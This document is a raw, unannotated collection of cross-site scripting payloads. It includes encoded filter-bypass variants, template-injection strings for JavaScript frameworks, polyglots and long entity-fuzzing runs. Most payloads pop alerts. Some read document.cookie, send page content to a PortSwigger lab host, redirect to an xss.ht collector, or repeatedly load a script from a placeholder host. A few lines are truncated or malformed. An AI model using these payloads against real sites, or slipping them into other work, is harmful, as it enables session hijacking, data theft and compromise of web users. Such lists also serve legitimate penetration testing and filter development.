#<iframe src="javascript:alert('XSS');"></iframe>
#<body onload="alert('XSS')">
d="alert('XSS');\")";
echo('IPT>alert("XSS")</SCRIPT>'); ?>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<Video> <source onerror = "javascript: alert (XSS)">
(A(%22onerror='alert%601%60'testabcd))/
<applet code="javascript:confirm(document.cookie);">
<isindex x="javascript:" onmouseover="alert(XSS)">
"><img src="x:x" onerror="alert(XSS)">
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'>
<style>//*{x:expression(alert(/xss/))}//<style></style>
<img src="/" =_=" title="onerror='prompt(1)'">
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe
<script x> alert(1) </script 1=2
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
<form><button formaction=javascript&colon;alert(1)>CLICKME
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[‘al\x65rt’](1)
top[8680439..toString(30)](1)
<button onClick="alert('xss')">Submit</button>
<svg><animate onend=alert(1) attributeName=x dur=1s>
<audio src/onerror=alert(1)>
<a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
<script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>
<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>
<iframe srcdoc=&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;></iframe>
<iframe src="javascript:'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;'"></iframe>
<img src=x onerror=location=atob`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21haW4p`>
<script>onerror=alert;throw 1</script>
<script>{onerror=alert}throw 1</script>
<script>throw onerror=alert,1</script>
<script>throw onerror=eval,e=new Error,e.message='alert\x281\x29',e</script>
<script>throw onerror=Uncaught=eval,e=new Error,e.message='/*'+location.hash,!!window.InstallTrigger?e:e.message</script>
<script>throw/x/,onerror=Uncaught=eval,h=location.hash,e=Error,e.lineNumber=e.columnNumber=e.fileName=e.message=h[2]+h[1]+h,!!window.InstallTrigger?e:e.message</script>
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
<script>location='javascript:alert\x281\x29'</script>
<script>location=name</script>
<script>alert`1`</script>
<script>throw[onerror]=[alert],1</script>
<script>var{haha:onerror=alert}=0;throw 1</script>
<script>new Function`X${document.location.hash.substr`1`}`</script>
<script>Function`X${document.location.hash.substr`1`}```</script>
<script>var{a:onerror}={a:alert};throw 1</script>
blah(""+new class b{toString=e=>location=name}+"")</script>
<xss class=progress-bar-animated onanimationstart=alert(1)>
<script>import('data:text/javascript,alert(1)')</script>
<xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>
<a href="&#X6A;avascript:alert(1)">XSS</a>
<a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>
<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>
<script>\u0061lert(1)</script>
<script>\u{61}lert(1)</script>
<script>eval('\x61lert(1)')</script>
<a href="&#0000106avascript:alert(1)">XSS</a>
<a href="&#x6a;avascript:alert(1)">XSS</a>
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋
%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74
">'><details/open/ontoggle=confirm('XSS')>
<input type="hidden" value="mypayload" /> %22%20autofocus%20onfocus%3d(confirm)(1)%2f%2f
%22%20autofocus%20onfocus%00%3d(confirm)(1)%2f%2f
javascript:new%20Function`al\ert\`1\``;
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
&lt;script&gt;alert(1)&lt;/script&gt;
&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;
&amp;amp;lt;script&amp;amp;gt;alert(1)&amp;amp;lt;/script&amp;amp;gt;
&amp;amp;amp;lt;script&amp;amp;amp;gt;alert(1)&amp;amp;amp;lt;/script&amp;amp;amp;gt;
&amp;amp;amp;amp;lt;script&amp;amp;amp;amp;gt;alert(1)&amp;amp;amp;amp;lt;/script&amp;amp;amp;amp;gt;
&lt;img src=1 onerror=alert(1)&gt;
&amp;lt;img src=1 onerror=alert(1)&amp;gt;
&amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;gt;
&amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;gt;
&amp;amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;amp;gt;
"&lt;img src=1 onerror=alert(1)&gt;
"&amp;lt;img src=1 onerror=alert(1)&amp;gt;
"&amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;gt;
"&amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;gt;
"&amp;amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;amp;gt;
"&gt;&lt;img src=x onerror=prompt(document.domain);&gt;
"&amp;gt;&amp;lt;img src=x onerror=prompt(document.domain);&amp;gt;
"&amp;amp;gt;&amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;gt;
"&amp;amp;amp;gt;&amp;amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;amp;gt;
"&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;amp;amp;gt;
"&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;amp;amp;amp;gt;
”&gt;&lt;svg onload=alert&amp;#0000000040"1")&gt;
”&amp;gt;&amp;lt;svg onload=alert&amp;amp;#0000000040"1")&amp;gt;
”&amp;amp;gt;&amp;amp;lt;svg onload=alert&amp;amp;amp;#0000000040"1")&amp;amp;gt;
”&amp;amp;amp;gt;&amp;amp;amp;lt;svg onload=alert&amp;amp;amp;amp;#0000000040"1")&amp;amp;amp;gt;
”&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;svg onload=alert&amp;amp;amp;amp;amp;#0000000040"1")&amp;amp;amp;amp;gt;
"&gt;&lt;svg onload=alert(1)&gt;
"&amp;gt;&amp;lt;svg onload=alert(1)&amp;gt;
"&amp;amp;gt;&amp;amp;lt;svg onload=alert(1)&amp;amp;gt;
"&amp;amp;amp;gt;&amp;amp;amp;lt;svg onload=alert(1)&amp;amp;amp;gt;
"&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;svg onload=alert(1)&amp;amp;amp;amp;gt;
&lt;img/src/onerror=alert(`ibro`)&gt;
&amp;lt;img/src/onerror=alert(`ibro`)&amp;gt;
&amp;amp;lt;img/src/onerror=alert(`ibro`)&amp;amp;gt;
&amp;amp;amp;lt;img/src/onerror=alert(`ibro`)&amp;amp;amp;gt;
&amp;amp;amp;amp;lt;img/src/onerror=alert(`ibro`)&amp;amp;amp;amp;gt;
javascript:\/\/\'\/<\/title><\/style><\/textarea><\/script>--><p%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B\'%22%2F%2F%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+\'Audi%20RS5\'.substr(0,4)}}XXX%3Cscript%3Ealert(\'XSS\')
javascript:\\\/\\\/\\\'\\\/<\\\/title><\\\/style><\\\/textarea><\\\/script>--><p%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B\\\'%22%2F%2F%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+\\\'Audi%20RS5\\\'.substr(0,4)}}XXX%3Cscript%3Ealert(\\\'XSS\\\')
javascript:\\\\\\\/\\\\\\\/\\\\\\\'\\\\\\\/<\\\\\\\/title><\\\\\\\/style><\\\\\\\/textarea><\\\\\\\/script>--><p%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B\\\\\\\'%22%2F%2F%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+\\\\\\\'Audi%20RS5\\\\\\\'.substr(0,4)}}XXX%3Cscript%3Ealert(\\\\\\\'XSS\\\\\\\')
javascript:\/\/%250Aalert(1)
javascript:\\\/\\\/%250Aalert(1)
javascript:\\\\\\\/\\\\\\\/%250Aalert(1)
javascript:\\\\\\\\\\\\\\\/\\\\\\\\\\\\\\\/%250Aalert(1)
jaVasCript:\/*-\/*`\/*\\`\/*\'\/*\"\/**\/(\/* *\/oNcliCk=alert() )\/\/%0D%0A%0D%0A\/\/<\/stYle\/<\/titLe\/<\/teXtarEa\/<\/scRipt\/--!>\\x3csVg\/<sVg\/oNloAd=alert()\/\/>\\x3e
jaVasCript:\\\/*-\\\/*`\\\/*\\\\`\\\/*\\\'\\\/*\\\"\\\/**\\\/(\\\/* *\\\/oNcliCk=alert() )\\\/\\\/%0D%0A%0D%0A\\\/\\\/<\\\/stYle\\\/<\\\/titLe\\\/<\\\/teXtarEa\\\/<\\\/scRipt\\\/--!>\\\\x3csVg\\\/<sVg\\\/oNloAd=alert()\\\/\\\/>\\\\x3e
jaVasCript:\\\\\\\/*-\\\\\\\/*`\\\\\\\/*\\\\\\\\`\\\\\\\/*\\\\\\\'\\\\\\\/*\\\\\\\"\\\\\\\/**\\\\\\\/(\\\\\\\/* *\\\\\\\/oNcliCk=alert() )\\\\\\\/\\\\\\\/%0D%0A%0D%0A\\\\\\\/\\\\\\\/<\\\\\\\/stYle\\\\\\\/<\\\\\\\/titLe\\\\\\\/<\\\\\\\/teXtarEa\\\\\\\/<\\\\\\\/scRipt\\\\\\\/--!>\\\\\\\\x3csVg\\\\\\\/<sVg\\\\\\\/oNloAd=alert()\\\\\\\/\\\\\\\/>\\\\\\\\x3e
window['alert']()
this['alert']()
(alert)()
eval(atob('YWxlcnQoKQ=='))
document['cookie']
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>
<input onauxclick=alert(1)>
<video onfullscreenchange=alert(1) src=validvideo.mp4 controls>
<input oninput=alert(1) value=xss>
<xss onkeypress="alert(1)" contenteditable style=display:block>test</xss>
<a onpaste="alert(1)" contenteditable>test</a>
%EF%BC%9Cscript%EF%BC%9E alert() %EF%BC%9C/script%EF%BC%9E
%EF%BC%9Cscript%EF%BC%9Ealert()%EF%BC%9C/script%EF%BC%9E
%EF%BC%9Cimg%20src%3Dxxx%20onerror%3Dalert(1)%EF%BC%9E
%3Cimg%20src=xx%20onerror=alert(1)%3E
<xss onafterscriptexecute=alert(1)><script>1</script>
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss>
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>
<body onbeforeprint=console.log(1)>
<xss onbeforescriptexecute=alert(1)><script>1</script>
<body onbeforeunload=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)>
<audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
<audio controls ondurationchange=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>
<a id=x tabindex=1 onfocus=alert(1)></a>
<acronym id=x tabindex=1 onfocus=alert(1)></acronym>
<address id=x tabindex=1 onfocus=alert(1)></address>
<applet id=x tabindex=1 onfocus=alert(1)></applet>
<img usemap=#x><map name="x"><area href onfocus=alert(1) id=x>
<button autofocus onfocus=alert(1)>test</button>
<data id=x tabindex=1 onfocus=alert(1)></data>
<footer id=x tabindex=1 onfocus=alert(1)></footer>
<form id=x tabindex=1 onfocus=alert(1)></form>
<frameset><frame id=x onfocus=alert(1)>
<head id=x tabindex=1 onfocus=alert(1) style=display:block></head>
<img id=x tabindex=1 onfocus=alert(1)></img>
<image id=x tabindex=1 onfocus=alert(1)></image>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
<audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav" type="audio/wav"></audio>
<body onmessage=print()>
<body onresize="print()">
<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
<details ontoggle=alert(1) open>test</details>
<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
<xss draggable="true" ondragleave="alert(1)" style=display:block>test</xss>
<body onpageshow=alert(1)>
<body onpopstate=print()>
<audio controls onprogress=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>
<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />
<xss onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><span id=x>test</span></xss>
<noembed><img title="</noembed><img src onerror=alert(1)>"></noembed>
<style><img title="</style><img src onerror=alert(1)>"></style>
<textarea><img title="</textarea><img src onerror=alert(1)>"></textarea>
<title><img title="</title><img src onerror=alert(1)>"></title>
<noscript><img title="</noscript><img src onerror=alert(1)>"></noscript>
<noframes><img title="</noframes><img src onerror=alert(1)>"></noframes>
<iframe><img title="</iframe><img src onerror=alert(1)>"></iframe>
<xmp><img title="</xmp><img src onerror=alert(1)>"></xmp>
{{_s.constructor('alert(1)')()}}
#{{_s.constructor('alert(1)')()}}
<p v-show="_c.constructor`alert(1)`()">
<x v-on:click='_b.constructor`alert(1)`()'>click</x>
<x :[_b.constructor`alert(1)`()]>
<p :=_c.constructor`alert(1)`()>
<x @click='_b.constructor`alert(1)`()'>click</x>
<x title"="&lt;iframe&Tab;onload&Tab;=alert(1)&gt;">
<x title"="&lt;iframe&Tab;onload&Tab;=setTimeout(/alert(1)/.source)&gt;">
{{$el.innerHTML='\u003cimg src onerror=alert(1)\u003e'}}
\u003cimg src onerror=alert(1)\u003e
"><image/src/onerror=prompt("ibrahimxss")>
"><ImG%20sRc=x%20onErroR=prompt`ibrahimxss`>
';alert("ibrahimxss");//
“>-setTimeout`\u0028alert(1)\u0029`-’
</option><img src=x onerror=alert(origin)>
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()>
javascript:74163166147401571561541571411447514115414516216450615176
%22%3EEnter_Mouse_Pointer_Here_to_get_XSS%3C%5K/onpointerenter=alert(location)%3E%3!
<img src=”invalid-image” onerror=”alert(document.cookie)”>
"{text:<img/src=x onload=confirm(1)>}"
{text:<img/src=x onload=confirm(1)>}
%7b%0a%20%20%22%64%61%74%61%22%3a%20%22%7b%74%65%78%74%3a%3c%69%6d%67%2f%73%72%63%3d%78%20%6f%6e%6c%6f%61%64%3d%63%6f%6e%66%69%72%6d%28%31%29%3e%7d%22%2c%0a%20%20%22%65%76%65%6e%74%49%44%22%3a%20%32%33%34%32%33%0a%7d
“autofocus onclick=’alert()
“autofocus onclick=’&#97;lert()’
ibrahimxss“autofocus onclick=’&#97;lert()’
<​script type="text/javascript">javascript​:alert(1);<​/script>
“><script>alert(1);</script>
"><img/src=x/onerro=6><img/src="1"/onerror=alert(1);>?test=test
"><img/src=x/onerro=6><img/src="1"/onerror=alert(1);>
<img/src=x/onerro=6><img/src="1"/onerror=alert(1);>?test=test
"><img/src=x/onerro=6><img/src="1"/onerror=import(location.search.split("aa=").pop());>
%22%3E%3Cimg/src=x/onerro=6%3E%3Cimg/src=%221%22/onerror=alert(1);%3E1
<svg@load=this.alert(1)>
<img src @error=this.alert(1)>
(Z("onerror="a=print,a`1`"))
(Z("onerror="a=console,a.log`${cookie}`"))
<img sr%00c=x o%00nerror=((pro%00mpt(1)))>
<img src @error=e=$event.composedPath().pop().alert(1)>
{{_toDisplayString.constructor('alert(1)')()}}
<teleport to=script:nth-child(2)>alert&lpar;1&rpar;</teleport></div><script></script>
<component is=script text=alert(1)>
<x @click=$event.view.alert(1)>click</x>
<x v-bind:a='_b.constructor`alert(1)`()'>
<a @['c\lic\u{6b}']="_c.constructor('alert(1)')()">test</a>
<img src @error=e=$event.path.pop().alert(1)>
{{_openBlock.constructor('alert(1)')()}}
#{{_openBlock.constructor('alert(1)')()}}
{{_Vue.h.constructor`alert(1)`()}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
{{{}.")));alert(1)//"}}
{{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )));}}
{}.")));alert(1)//";
'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
xss'''><iframe srcdoc='%26it;script>;prompt` ${document.domain}`%26it;/script>'>
["');alert('xss');//"]@xyz.xxx
<c/onpointerrawupdate=d=document,b=%27%60%27,d[%27loca%27%2B%27tion%27]=%27javascript%26colon;aler%27%2B%27t%27%2Bb%2Bdomain%2Bb>
<svg/onload=location/**/='http://GH0ST.xss.ht/'+document.dom
autofocus ' onfocus='alert(document.domain)'
"autofocus onfocus='alert(document.domain)'
"><svg+onload=alert&amp;#x00"1
"><svg+onload=alert&amp;#x01"1
"><svg+onload=alert&amp;#x02"1
"><svg+onload=alert&amp;#x03"1
"><svg+onload=alert&amp;#x04"1
"><svg+onload=alert&amp;#x05"1
"><svg+onload=alert&amp;#x06"1
"><svg+onload=alert&amp;#x07"1
"><svg+onload=alert&amp;#x08"1
"><svg+onload=alert&amp;#x09"1
"><svg+onload=alert&amp;#x0A"1
"><svg+onload=alert&amp;#x0B"1
"><svg+onload=alert&amp;#x0C"1
"><svg+onload=alert&amp;#x0D"1
"><svg+onload=alert&amp;#x0E"1
"><svg+onload=alert&amp;#x0F"1
"><svg+onload=alert&amp;#x10"1
"><svg+onload=alert&amp;#x11"1
"><svg+onload=alert&amp;#x12"1
"><svg+onload=alert&amp;#x13"1
"><svg+onload=alert&amp;#x14"1
"><svg+onload=alert&amp;#x15"1
"><svg+onload=alert&amp;#x16"1
"><svg+onload=alert&amp;#x17"1
"><svg+onload=alert&amp;#x18"1
"><svg+onload=alert&amp;#x19"1
"><svg+onload=alert&amp;#x1A"1
"><svg+onload=alert&amp;#x1B"1
"><svg+onload=alert&amp;#x1C"1
"><svg+onload=alert&amp;#x1D"1
"><svg+onload=alert&amp;#x1E"1
"><svg+onload=alert&amp;#x1F"1
"><svg+onload=alert&amp;#x20"1
"><svg+onload=alert&amp;#x21"1
"><svg+onload=alert&amp;#x22"1
"><svg+onload=alert&amp;#x23"1
"><svg+onload=alert&amp;#x24"1
"><svg+onload=alert&amp;#x25"1
"><svg+onload=alert&amp;#x26"1
"><svg+onload=alert&amp;#x27"1
"><svg+onload=alert&amp;#x28"1
"><svg+onload=alert&amp;#x29"1
"><svg+onload=alert&amp;#x2A"1
"><svg+onload=alert&amp;#x2B"1
"><svg+onload=alert&amp;#x2C"1
"><svg+onload=alert&amp;#x2D"1
"><svg+onload=alert&amp;#x2E"1
"><svg+onload=alert&amp;#x2F"1
"><svg+onload=alert&amp;#x30"1
"><svg+onload=alert&amp;#x31"1
"><svg+onload=alert&amp;#x32"1
"><svg+onload=alert&amp;#x30"1
"><svg+onload=alert&amp;#x31"1
"><svg+onload=alert&amp;#x32"1
"><svg+onload=alert&amp;#x33"1
"><svg+onload=alert&amp;#x34"1
"><svg+onload=alert&amp;#x35"1
"><svg+onload=alert&amp;#x36"1
"><svg+onload=alert&amp;#x37"1
"><svg+onload=alert&amp;#x38"1
"><svg+onload=alert&amp;#x39"1
"><svg+onload=alert&amp;#x41"1
"><svg+onload=alert&amp;#x42"1
"><svg+onload=alert&amp;#x43"1
"><svg+onload=alert&amp;#x44"1
"><svg+onload=alert&amp;#x45"1
"><svg+onload=alert&amp;#x46"1
"><svg+onload=alert&amp;#x47"1
"><svg+onload=alert&amp;#x48"1
"><svg+onload=alert&amp;#x49"1
"><svg+onload=alert&amp;#x4A"1
"><svg+onload=alert&amp;#x4B"1
"><svg+onload=alert&amp;#x4C"1
"><svg+onload=alert&amp;#x4D"1
"><svg+onload=alert&amp;#x4E"1
"><svg+onload=alert&amp;#x4F"1
"><svg+onload=alert&amp;#x50"1
"><svg+onload=alert&amp;#x51"1
"><svg+onload=alert&amp;#x52"1
"><svg+onload=alert&amp;#x53"1
"><svg+onload=alert&amp;#x54"1
"><svg+onload=alert&amp;#x55"1
"><svg+onload=alert&amp;#x56"1
"><svg+onload=alert&amp;#x57"1
"><svg+onload=alert&amp;#x58"1
"><svg+onload=alert&amp;#x59"1
"><svg+onload=alert&amp;#x5A"1
"><svg+onload=alert&amp;#x5B"1
"><svg+onload=alert&amp;#x5C"1
"><svg+onload=alert&amp;#x5D"1
"><svg+onload=alert&amp;#x5E"1
"><svg+onload=alert&amp;#x5F"1
"><svg+onload=alert&amp;#x60"1
"><svg+onload=alert&amp;#x61"1
"><svg+onload=alert&amp;#x62"1
"><svg+onload=alert&amp;#x63"1
"><svg+onload=alert&amp;#x64"1
"><svg+onload=alert&amp;#x65"1
"><svg+onload=alert&amp;#x66"1
"><svg+onload=alert&amp;#x67"1
"><svg+onload=alert&amp;#x68"1
"><svg+onload=alert&amp;#x69"1
"><svg+onload=alert&amp;#x6A"1
"><svg+onload=alert&amp;#x6B"1
"><svg+onload=alert&amp;#x6C"1
"><svg+onload=alert&amp;#x6D"1
"><svg+onload=alert&amp;#x6E"1
"><svg+onload=alert&amp;#x6F"1
"><svg+onload=alert&amp;#x70"1
"><svg+onload=alert&amp;#x71"1
"><svg+onload=alert&amp;#x72"1
"><svg+onload=alert&amp;#x73"1
"><svg+onload=alert&amp;#x74"1
"><svg+onload=alert&amp;#x75"1
"><svg+onload=alert&amp;#x76"1
"><svg+onload=alert&amp;#x77"1
"><svg+onload=alert&amp;#x78"1
"><svg+onload=alert&amp;#x79"1
"><svg+onload=alert&amp;#x7A"1
"><svg+onload=alert&amp;#x7B"1
"><svg+onload=alert&amp;#x7C"1
"><svg+onload=alert&amp;#x7D"1
"><svg+onload=alert&amp;#x7E"1
"><svg+onload=alert&amp;#x7F"1
"><svg+onload=alert&amp;#x80"1
"><svg+onload=alert&amp;#x81"1
"><svg+onload=alert&amp;#x82"1
"><svg+onload=alert&amp;#x83"1
"><svg+onload=alert&amp;#x84"1
"><svg+onload=alert&amp;#x85"1
"><svg+onload=alert&amp;#x86"1
"><svg+onload=alert&amp;#x87"1
"><svg+onload=alert&amp;#x88"1
"><svg+onload=alert&amp;#x89"1
"><svg+onload=alert&amp;#x8A"1
"><svg+onload=alert&amp;#x8B"1
"><svg+onload=alert&amp;#x8C"1
"><svg+onload=alert&amp;#x8D"1
"><svg+onload=alert&amp;#x8E"1
"><svg+onload=alert&amp;#x8F"1
"><svg+onload=alert&amp;#x90"1
"><svg+onload=alert&amp;#x91"1
"><svg+onload=alert&amp;#x92"1
"><svg+onload=alert&amp;#x93"1
"><svg+onload=alert&amp;#x94"1
"><svg+onload=alert&amp;#x95"1
"><svg+onload=alert&amp;#x96"1
"><svg+onload=alert&amp;#x97"1
"><svg+onload=alert&amp;#x98"1
"><svg+onload=alert&amp;#x99"1
"><svg+onload=alert&amp;#x107"1
"><svg+onload=alert&amp;#x9A"1
<x onxxx=alert(1) 1='
"><img src=x onerror=prompt&#x000000028;document&#x00000002E;domain&#x000000029;&#x00000003B;>
<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
<script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<event-source src=javascript:alert(1)>
<iMg onerror=alert(1) src=a>
<[%00]img onerror=alert(1) src=a>
<i[%00]mg onerror=alert(1) src=a>
<img[%09]onerror=alert(1) src=a>
<img[%0a]onerror=alert(1) src=a>
<img/’onerror=alert(1) src=a>
<img/anyjunk/onerror=alert(1) src=a>
<img o[%00]nerror=alert(1) src=a>
<img onerror=a[%00]lert(1) src=a>
<img onerror=a&#x6c;ert(1) src=a>
<iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;1&#x29;>
<img onerror=a&#x06c;ert(1) src=a>
<img onerror=a&#x006c;ert(1) src=a>
<img onerror=a&#108;ert(1) src=a>
<img onerror=a&#108ert(1) src=a>
<img onerror=a&#0108ert(1) src=a>
<img onerror=eval(‘al&#x5c;u0065rt(1)’)src=a>
<imgonerror=&#x65;&#x76;&#x61;&#x6c;&#x28;&#x27;al&#x5c;u0065rt&#x28;1& #x29;&#x27;&#x29; src=a
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>
"><img src=1 onerror=alert(1)>.gif
";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt'](1)/*\*/ }, 5000);"></inpuT%3E;
<image/src/onerror=prompt(8)>
<img/src/onerror=prompt(8)>
<image src/onerror=prompt(8)>
<img src/onerror=prompt(8)>
<image src =q onerror=prompt(8)>
<img src =q onerror=prompt(8)>
</scrip</script>t><img src =q onerror=prompt(8)>
<svg onload=alert(1)>
"><svg onload=alert(1)//
"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//
'-alert(1)//
1"--></script><svg/onload=';alert(document.domain);'>
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
